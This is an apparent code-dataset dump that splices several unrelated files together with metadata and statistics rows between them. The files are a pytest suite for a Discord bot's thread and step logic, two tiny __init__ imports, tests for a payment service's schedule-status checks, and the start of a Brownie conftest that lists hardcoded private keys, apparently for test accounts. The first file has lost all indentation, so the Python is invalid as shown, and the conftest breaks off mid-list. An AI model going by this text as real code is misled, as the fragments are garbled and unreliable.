user_id="", current_step=root_hash, message_id="", guild_id=""
)
assert thread.steps
@pytest.mark.asyncio
async def test_thread_send_raise():
root_hash = get_root_hash()
thread = MultiForkThread(
user_id="", current_step=root_hash, message_id="", guild_id=""
)
with pytest.raises(Exception):
thread.send()
# Test thread send #
@pytest.mark.asyncio
async def test_thread_send_emoji_step():
"""
Throw an error if we try to send on an emoji step
"""
root_hash = get_root_hash()
thread = EmojiThread(user_id="", current_step=root_hash, message_id="", guild_id="")
with pytest.raises(Exception):
await thread.send()
@pytest.mark.asyncio
async def test_thread_send_previous_step_no_skip():
"""
Throw an error if we try to send on an emoji step
"""
global saved
saved = False
class EmojiLogic(BaseStep):
name = "emoji"
emoji = True
async def handle_emoji(self, raw_reaction):
return None, None
async def send(self, message, user_id):
return None, None
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return None, None
async def save(self, message, guild_id, user_id):
global saved
saved = True
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return Step(current=SendLogic()).add_next_step(EmojiLogic()).build()
root_hash = get_root_hash()
cache = MockCache()
thread = await MockThread(
user_id="2",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
hash_ = thread.step.get_next_step("emoji").hash_
second_step = await MockThread(
user_id="2",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await second_step.handle_reaction(MagicMock(message_id=""), "")
assert saved is True
@pytest.mark.asyncio
async def test_thread_send_previous_step_skip(mocker):
"""
Throw an error if we try to send on an emoji step
"""
global saved
saved = False
class EmojiLogic(BaseStep):
name = "emoji"
emoji = True
async def handle_emoji(self, raw_reaction):
return None, True
async def send(self, message, user_id):
return None, None
async def save(self, message, guild_id, user_id):
global saved
saved = True
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return Step(current=EmojiLogic())
root_hash = get_root_hash()
thread = await MockThread(
user_id="",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
)
await thread.handle_reaction(MagicMock(message_id=""), "")
assert saved is False
@pytest.mark.asyncio
async def test_thread_send_no_previous_step_skip(mocker):
"""
Throw an error if we try to send on an emoji step
"""
global saved
saved = False
class EmojiLogic(BaseStep):
name = "emoji"
emoji = True
async def handle_emoji(self, raw_reaction):
return None, True
async def send(self, message, user_id):
return None, None
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return None, {"example": 0}
async def save(self, message, guild_id, user_id):
global saved
saved = True
class MockThread(BaseThread):
async def get_steps(self):
return Step(current=SendLogic()).add_next_step(EmojiLogic()).build()
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
)
hash_ = thread.step.get_next_step("emoji").hash_
second_step = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
cache=cache,
discord_bot=AsyncMock(),
)
await second_step.handle_reaction(MagicMock(message_id=""), "")
assert saved is False
assert cache.internal == {}
@pytest.mark.asyncio
async def test_thread_metadata_none(mocker):
"""
Throw an error if we try to send on an emoji step
"""
class FirstLogic(BaseStep):
name = "first"
async def send(self, message, user_id):
return message, {"example": 0}
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return message, None
class LastLogic(BaseStep):
name = "last"
async def send(self, message, user_id):
return None, None
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return (
Step(current=FirstLogic())
.add_next_step(SendLogic())
.add_next_step(LastLogic())
.build()
)
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await thread.send(AsyncMock(message_id="", id="1"))
hash_ = thread.step.get_next_step("send").hash_
t2 = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await t2.send(AsyncMock(message_id="", id="1"))
assert json.loads(await cache.get("1")).get("metadata") == {"example": 0}
@pytest.mark.asyncio
async def test_thread_metadata_set(mocker):
"""
Throw an error if we try to send on an emoji step
"""
class FirstLogic(BaseStep):
name = "first"
async def send(self, message, user_id):
return message, {"example": 0}
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return message, {"example": 2}
class LastLogic(BaseStep):
name = "last"
async def send(self, message, user_id):
return None, None
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return (
Step(current=FirstLogic())
.add_next_step(SendLogic())
.add_next_step(LastLogic())
.build()
)
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await thread.send(AsyncMock(message_id="", id="1"))
hash_ = thread.step.get_next_step("send").hash_
t2 = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await t2.send(AsyncMock(message_id="", id="1"))
assert json.loads(await cache.get("1")).get("metadata") == {"example": 2}
@pytest.mark.asyncio
async def test_thread_control_hook_end(mocker):
"""
Throw an error if we try to send on an emoji step
"""
class FirstLogic(BaseStep):
name = "first"
async def send(self, message, user_id):
return message, {"example": 0}
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return message, {"example": 2}
async def control_hook(self, message, user_id):
return StepKeys.END.value
class LastLogic(BaseStep):
name = "last"
async def send(self, message, user_id):
return None, None
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return (
Step(current=FirstLogic())
.add_next_step(SendLogic())
.add_next_step(LastLogic())
.build()
)
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await thread.send(AsyncMock(message_id="", id="1"))
assert json.loads(await cache.get("1")) is not None
hash_ = thread.step.get_next_step("send").hash_
t2 = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await t2.send(AsyncMock(message_id="", id="1"))
assert await cache.get("1") is None
@pytest.mark.asyncio
async def test_thread_override_step_and_step(mocker):
"""
Throw an error if we try to send on an emoji step
"""
global third_step
third_step = False
class FirstLogic(BaseStep):
name = "first"
async def send(self, message, user_id):
return message, {"example": 0}
class SendLogic(BaseStep):
name = "send"
async def send(self, message, user_id):
return message, {"example": 2}
async def control_hook(self, message, user_id):
return "last"
class LastLogic(BaseStep):
name = "last"
async def send(self, message, user_id):
global third_step
third_step = True
return None, None
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return (
Step(current=FirstLogic())
.add_next_step(SendLogic())
.add_next_step(LastLogic())
.build()
)
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await thread.send(AsyncMock(message_id="", id="1"))
hash_ = thread.step.get_next_step("send").hash_
t2 = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await t2.send(AsyncMock(message_id="", id="1"))
assert third_step is True
@pytest.mark.asyncio
async def test_thread_trigger(mocker):
"""
Throw an error if we try to send on an emoji step
"""
global third_step
third_step = False
class FirstLogic(BaseStep):
name = "first"
async def send(self, message, user_id):
return message, {"example": 0}
class SendLogic(BaseStep):
name = "send"
trigger = True
async def send(self, message, user_id):
return message, {"example": 2}
class LastLogic(BaseStep):
name = "last"
async def send(self, message, user_id):
global third_step
third_step = True
return None, None
class MockThread(BaseThread):
name = "thread"
async def get_steps(self):
return (
Step(current=FirstLogic())
.add_next_step(SendLogic())
.add_next_step(LastLogic())
.build()
)
cache = MockCache()
root_hash = get_root_hash()
thread = await MockThread(
user_id="1",
current_step=root_hash,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await thread.send(AsyncMock(message_id="", id="1"))
hash_ = thread.step.get_next_step("send").hash_
t2 = await MockThread(
user_id="1",
current_step=hash_,
message_id="",
guild_id="",
discord_bot=AsyncMock(),
cache=cache,
)
await t2.send(AsyncMock(message_id="", id="1"))
assert third_step is True
| 24.376833
| 88
| 0.595489
| 1,967
| 16,625
| 4.811896
| 0.064565
| 0.053249
| 0.042789
| 0.048494
| 0.874379
| 0.852826
| 0.839725
| 0.803698
| 0.778764
| 0.732911
| 0
| 0.004513
| 0.293594
| 16,625
| 681
| 89
| 24.412628
| 0.801431
| 0.003308
| 0
| 0.770186
| 0
| 0
| 0.020223
| 0
| 0
| 0
| 0
| 0
| 0.031056
| 1
| 0.00207
| false
| 0.014493
| 0.012422
| 0.00207
| 0.252588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32c879eb962ca488acfedef0ae7b9199d492eec6
| 167
|
py
|
Python
|
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/models/losses/__init__.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
from .binary_crossentropy import binary_crossentropy
from .categorical_crossentropy import categorical_crossentropy
from .mean_squared_error import mean_squared_error
| 41.75
| 62
| 0.91018
| 20
| 167
| 7.2
| 0.4
| 0.25
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071856
| 167
| 3
| 63
| 55.666667
| 0.929032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3ef5a0c45e957ceb20bdd824e24e34d9ecac689c
| 66
|
py
|
Python
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
jaxnb/NaviGator
|
2edb85cf5eab38f62132b3f467814516d2bb05f3
|
[
"MIT"
] | 27
|
2020-02-17T21:54:09.000Z
|
2022-03-18T17:49:23.000Z
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
jaxnb/NaviGator
|
2edb85cf5eab38f62132b3f467814516d2bb05f3
|
[
"MIT"
] | 325
|
2019-09-11T14:13:56.000Z
|
2022-03-31T00:38:30.000Z
|
mission_systems/navigator_scan_the_code/navigator_scan_the_code/__init__.py
|
ericgorday/NaviGator
|
cc929a8609d7a416d0b8c9a95059e296f669464a
|
[
"MIT"
] | 24
|
2019-09-16T00:29:45.000Z
|
2022-03-06T10:56:38.000Z
|
import scan_the_code_mission
from scan_the_code_mission import *
| 16.5
| 35
| 0.878788
| 11
| 66
| 4.727273
| 0.545455
| 0.269231
| 0.423077
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106061
| 66
| 3
| 36
| 22
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
410ac62fe8398c13366bff8c150b7d1848f395ff
| 12,569
|
py
|
Python
|
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/tests/unit/services/test_status_service.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the Status check service layer.
Test-Suite to ensure that the Status Service layer is working as expected.
"""
from datetime import datetime
from unittest.mock import patch
import pytz
from pay_api.services.status_service import StatusService
def test_get_schedules_with_name(app):
"""Assert that the function returns schedules."""
with app.app_context():
service_name = 'PAYBC'
get_response = StatusService().get_schedules(service_name=service_name)
assert get_response[0]['up'] is not None
def test_get_schedules_without_name(app):
"""Assert that the function don't return schedules."""
with app.app_context():
get_response = StatusService().get_schedules(service_name=None)
assert get_response is None
def test_get_schedules_with_name_not_exists(app):
"""Assert that the function don't return schedules."""
with app.app_context():
service_name = 'PAYBC1'
get_response = StatusService().get_schedules(service_name=service_name)
assert get_response is None
def test_get_nearest_datetime(app):
"""Assert that the function don't return schedules."""
with app.app_context():
dates: list = list()
dates.append(datetime(1988, 8, 1, 6, 30))
dates.append(datetime(1988, 8, 1, 7, 30))
check_date: datetime = datetime(1988, 8, 1, 5, 30)
get_response = StatusService().get_nearest_datetime(dates, check_date)
assert get_response == datetime(1988, 8, 1, 6, 30).timestamp()
def test_get_nearest_datetime_without_list(app):
"""Assert that the function don't return schedules."""
with app.app_context():
dates: list = list()
check_date: datetime = datetime(1988, 8, 1, 5, 30)
get_response = StatusService().get_nearest_datetime(dates, check_date)
assert get_response == 0
def test_get_nearest_datetime_without_date(app):
"""Assert that the function don't return schedules."""
with app.app_context():
dates: list = list()
dates.append(datetime(1988, 8, 1, 6, 30))
dates.append(datetime(1988, 8, 1, 7, 30))
check_date: datetime = None
get_response = StatusService().get_nearest_datetime(dates, check_date)
assert get_response == 0
def test_status_check_without_name(app):
"""Assert that the function returns schedules."""
with app.app_context():
service_name = None
check_date = datetime.utcnow()
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
assert get_response is not None
assert get_response['service'] == service_name
assert get_response['current_status'] == 'None'
def test_status_check_no_schedule(app):
"""Assert that the function return no schedule."""
# sunday 6:30am - 9:30pm
schedule_json = [{}]
with app.app_context():
service_name = 'PAYBC'
check_date = datetime.utcnow()
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert get_response['current_status']
assert get_response['current_down_time'] == 0
def test_status_check_status_false(app):
"""Assert that the function return a valid schedule."""
# Sunday 6:30am - 9:30pm
schedule_json = [{'up': '30 6 * * 6', 'down': '30 21 * * 6'}, {'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
# 1988-07-31 10:30pm US/Pacific Sunday / 1988-08-01 5:30am UTC
check_date: datetime = datetime(1988, 8, 1, 5, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert not get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 31, 21, 30)).timestamp()
assert get_response['next_up_time'] == timezone.localize(datetime(1988, 8, 6, 6, 30)).timestamp()
assert get_response['next_down_time'] == 0
def test_status_check_status_single_schedule(app):
"""Assert that the function return a valid schedule."""
# Sunday 6:30am - 9:30pm
schedule_json = [{'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
# 1988-07-31 10:30pm US/Pacific Sunday / 1988-08-01 5:30am UTC
check_date: datetime = datetime(1988, 8, 1, 5, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert not get_response['current_status']
def test_status_check_single_schedule(app):
"""Assert that the function return a valid schedule."""
# Sunday 6:30am - 9:30pm
schedule_json = [{'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
# 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
check_date: datetime = datetime(1988, 7, 30, 18, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == 0
assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 31, 21, 30)).timestamp()
assert get_response['next_up_time'] == 0
def test_status_check_single_schedule_down_first(app):
"""Assert that the function return a valid schedule."""
# Sunday 6:30am - 9:30pm
schedule_json = [{'down': '30 6 * * 6', 'up': '30 21 * * 6'}]
# 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
check_date: datetime = datetime(1988, 7, 30, 18, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert not get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 30, 6, 30)).timestamp()
assert get_response['next_down_time'] == 0
assert get_response['next_up_time'] == timezone.localize(datetime(1988, 7, 30, 21, 30)).timestamp()
def test_status_check_multiple_schedule(app):
"""Assert that the function don't return schedules."""
# Saturday 6:30am - 9:30pm, Sunday 6:30am - 9:30pm
schedule_json = [{'up': '30 6 * * 6', 'down': '30 21 * * 6'}, {'up': '30 6 * * 7', 'down': '30 21 * * 7'}]
# 1988-07-30 11:30am US/Pacific Saturday / 1988-07-30 6:30pm UTC
check_date: datetime = datetime(1988, 7, 30, 18, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
mock_get.stop()
assert get_response is not None
assert get_response['service'] == service_name
assert get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == 0
assert get_response['next_up_time'] == 0
assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 30, 21, 30)).timestamp()
def test_status_check_multiple_flexible_schedule(app):
"""Assert that the function don't return schedules."""
# Monday - Wedensday 6:30am - 9:30pm
# Thursday 6:30am -
# Friday - 9:30pm
# Saturday 6:30am - 9:30pm
# Sunday 6:30am - 9:30pm
schedule_json = [
{'up': '30 6 * * 1-3', 'down': '30 21 * * 1-3'},
{'up': '30 6 * * 4', 'down': '30 21 * * 4'},
{'down': '30 21 * * 5'},
{'up': '30 6 * * 6', 'down': '30 21 * * 6'},
{'up': '30 6 * * 7', 'down': '30 21 * * 7'},
]
# 1988-07-28 11:30am US/Pacific Thrusday / 1988-07-28 6:30pm UTC
check_date: datetime = datetime(1988, 7, 28, 18, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
assert get_response is not None
assert get_response['service'] == service_name
assert get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == 0
assert get_response['next_up_time'] == 0
assert get_response['next_down_time'] == timezone.localize(datetime(1988, 7, 28, 21, 30)).timestamp()
def test_status_check_multiple_flexible_schedule_false(app):
"""Assert that the function don't return schedules."""
# Monday - Wedensday 6:30am - 9:30pm
# Thursday 6:30am -
# Friday - 9:30pm
# Saturday 6:30am - 9:30pm
# Sunday 6:30am - 9:30pm
schedule_json = [
{'up': '30 6 * * 1-3', 'down': '30 21 * * 1-3'},
{'up': '30 6 * * 4', 'down': '30 21 * * 4'},
{'down': '30 21 * * 5'},
{'up': '30 6 * * 6', 'down': '30 21 * * 6'},
{'up': '30 6 * * 7', 'down': '30 21 * * 7'},
]
# 1988-07-29 11:30pm US/Pacific Friday / 1988-07-30 5:30am UTC
check_date: datetime = datetime(1988, 7, 30, 5, 30)
with app.app_context():
service_name = 'PAYBC'
mock_get_schedule = patch('pay_api.services.status_service.StatusService.get_schedules')
mock_get = mock_get_schedule.start()
mock_get.return_value = schedule_json
get_response = StatusService().schedule_status(service_name=service_name, check_date=check_date)
assert get_response is not None
assert get_response['service'] == service_name
assert not get_response['current_status']
timezone = pytz.timezone('US/Pacific')
assert get_response['current_down_time'] == timezone.localize(datetime(1988, 7, 29, 21, 30)).timestamp()
assert get_response['next_up_time'] == timezone.localize(datetime(1988, 7, 30, 6, 30)).timestamp()
assert get_response['next_down_time'] == 0
| 37.296736
| 112
| 0.666958
| 1,723
| 12,569
| 4.6361
| 0.094602
| 0.092263
| 0.102153
| 0.030045
| 0.892213
| 0.882699
| 0.860916
| 0.838758
| 0.815974
| 0.811217
| 0
| 0.065885
| 0.212666
| 12,569
| 336
| 113
| 37.407738
| 0.741209
| 0.179012
| 0
| 0.780749
| 0
| 0
| 0.146638
| 0.046265
| 0
| 0
| 0
| 0
| 0.278075
| 1
| 0.080214
| false
| 0
| 0.02139
| 0
| 0.101604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f5ac3d4e5bfef6e496ab1736605fc1aea3ec54f7
| 15,791
|
py
|
Python
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 31
|
2021-05-18T14:39:18.000Z
|
2022-01-28T17:01:49.000Z
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 172
|
2021-05-06T15:37:46.000Z
|
2022-03-31T17:51:17.000Z
|
solidity/tests/conftest.py
|
WilliamXieCrypto/gravity-bridge
|
9bf8d5df809364a1e465070a8cbb10cc888e8a21
|
[
"Apache-2.0"
] | 22
|
2021-05-10T19:44:47.000Z
|
2022-03-08T14:20:29.000Z
|
#!/usr/bin/python3
import pytest
import brownie
from brownie import web3, TestLogicContract, SimpleLogicBatchMiddleware, Gravity, TestERC20A, ReentrantERC20, TestTokenBatchMiddleware, HashingTest, Contract
from eth_abi import encode_abi
from eth_account.messages import encode_defunct
@pytest.fixture(scope="session")
def signers(accounts):
privKeys = getPrivKeys()
acc_len = len(accounts)
add_len = len(privKeys)
if acc_len > add_len:
return accounts[acc_len - add_len:]
for i in range(0, add_len):
accounts.add(privKeys[i])
accounts[0].transfer(accounts[acc_len + i], 3466666 * 10 ** 18)
return accounts[acc_len:]
def getPrivKeys():
return [
"0xc5e8f61d1ab959b397eecc0a37a6517b8e67a0e7cf1f4bce5591f3ed80199122",
"0xd49743deccbccc5dc7baa8e69e5be03298da8688a15dd202e20f15d5e0e9a9fb",
"0x23c601ae397441f3ef6f1075dcb0031ff17fb079837beadaf3c84d96c6f3e569",
"0xee9d129c1997549ee09c0757af5939b2483d80ad649a0eda68e8b0357ad11131",
"0x87630b2d1de0fbd5044eb6891b3d9d98c34c8d310c852f98550ba774480e47cc",
"0x275cc4a2bfd4f612625204a20a2280ab53a6da2d14860c47a9f5affe58ad86d4",
"0x7f307c41137d1ed409f0a7b028f6c7596f12734b1d289b58099b99d60a96efff",
"0x2a8aede924268f84156a00761de73998dac7bf703408754b776ff3f873bcec60",
"0x8b24fd94f1ce869d81a34b95351e7f97b2cd88a891d5c00abc33d0ec9501902e",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b29085",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b29086",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b29087",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b29088",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b29089",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908a",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908b",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908c",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908d",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908e",
"0x28d1bfbbafe9d1d4f5a11c3c16ab6bf9084de48d99fbac4058bdfa3c80b2908f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf00",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf01",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf02",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf03",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf04",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf05",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf06",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf07",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf08",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf09",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0c",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0d",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0e",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf0f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf10",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf11",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf12",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf13",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf14",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf15",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf16",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf17",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf18",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf19",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1c",
